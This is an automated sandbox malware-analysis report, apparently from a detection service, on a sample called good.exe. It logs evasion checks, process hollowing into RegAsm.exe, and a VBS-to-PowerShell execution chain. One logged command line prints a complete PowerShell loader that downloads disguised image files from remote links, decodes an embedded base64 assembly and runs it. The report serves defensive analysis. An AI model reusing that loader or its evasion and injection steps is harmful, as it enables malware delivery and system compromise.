                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara match; File source: Process Memory Space: powershell.exe PID: 8112, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe; Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; API/Special instruction interceptor: Address: 7FFE2220D044
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe; API/Special instruction interceptor: Address: 7FFE2220D044
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PETOOLS.EXEAUTORUNSC.EX
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OLLYDBG.EXE
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AEB77000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: EIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEP
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: X64DBG.EXE
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AEB77000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: INTERNALNAMECFF EXPLORER.EXE
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PETOOLS.EXE
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: WINDUMP.EXE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (2 occurrences)
                    Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2238
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1254
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3704
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6067
                    Source: C:\Users\user\Desktop\good.exe; Check user administrative privileges: GetTokenInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160; Thread sleep count: 3704 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164; Thread sleep count: 6067 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200; Thread sleep time: -14757395258967632s >= -30000s
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem (2 occurrences)
                    Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                    Source: C:\Users\user\Desktop\good.exe; Code function: 0_2_00007FF73191204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
                    Source: C:\Users\user\Desktop\good.exe; Code function: 0_2_00007FF7319164E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (2 occurrences)
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: FngTask_v1.0.MSFT_NetEventVmNetworkAdatper.cdxml.
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Add-NetEventVmNetworkAdapter
                    Source: fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: DisableGuestVmNetworkConnectivity
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: MSFT_NetEventVmNetworkAdatper.format.ps1xmlT_
                    Source: fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: EnableGuestVmNetworkConnectivity
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Get-NetEventVmNetworkAdapter
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF7319130EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7319130EC
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B00283 mov eax, dword ptr fs:[00000030h]12_3_02B00283
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\good.exe | Code function: 0_2_00007FF731918790 SetUnhandledExceptionFilter, 0_2_00007FF731918790
                    Source: C:\Users\user\Desktop\good.exe | Code function: 0_2_00007FF731918494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF731918494

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match | File source: amsi64_8112.amsi.csv, type: OTHER
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8112, type: MEMORYSTR
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, Progrgdfam3.cs | Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, Progrgdfam3.cs | Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, Progrgdfam3.cs | Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
                    Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, Progrgdfam3.cs | Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 439000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 449000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47C000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1169008
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs"
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '<obfuscated encoded script string omitted>'"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Users\user\Desktop\good.exe | Code function: 0_2_00007FF7319111CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary, 0_2_00007FF7319111CC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
